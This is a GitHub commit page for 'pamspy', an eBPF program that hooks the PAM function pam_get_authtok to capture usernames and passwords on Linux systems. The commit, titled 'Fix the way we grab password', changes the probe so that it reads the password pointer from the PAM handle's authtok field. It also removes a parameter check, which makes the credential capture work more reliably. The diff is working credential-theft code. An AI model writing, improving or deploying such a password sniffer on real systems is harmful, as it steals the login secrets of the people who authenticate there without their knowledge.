Fix the way we grab password

citronneur · Jul 6, 2022 · 71bff27 · 71bff27
1 parent e1ea136
commit 71bff27
Show file tree

Hide file tree

Showing 2 changed files with 2 additions and 5 deletions.
diff --git a/src/pamspy.bpf.c b/src/pamspy.bpf.c
@@ -55,17 +55,14 @@ int trace_pam_get_authtok(struct pt_regs *ctx)
   if (!PT_REGS_PARM1(ctx))
     return 0;
 
-  if (!PT_REGS_PARM3(ctx))
-    return 0;
-
   pam_handle_t* phandle = (pam_handle_t*)PT_REGS_PARM1(ctx);
 
   // Get current PID to track
   u32 pid = bpf_get_current_pid_tgid() >> 32;
 
   // retrieve output parameter
   u64 password_addr = 0;
-  bpf_probe_read(&password_addr, sizeof(password_addr), (void *)PT_REGS_PARM3(ctx));
+  bpf_probe_read(&password_addr, sizeof(password_addr), &phandle->authtok);
 
   u64 username_addr = 0;
   bpf_probe_read(&username_addr, sizeof(username_addr), &phandle->user);

diff --git a/src/pamspy_event.h b/src/pamspy_event.h
@@ -11,4 +11,4 @@ typedef struct _event_t {
     char password[80];  // secrets
 } event_t;
 
-#endif
+#endif
-Original file line number
+Diff line change
@@ Expand Up / @@ -11,4 +11,4 @@ typedef struct _event_t { @@
         char password[80];  // secrets
     } event_t;
-    #endif
+    #endif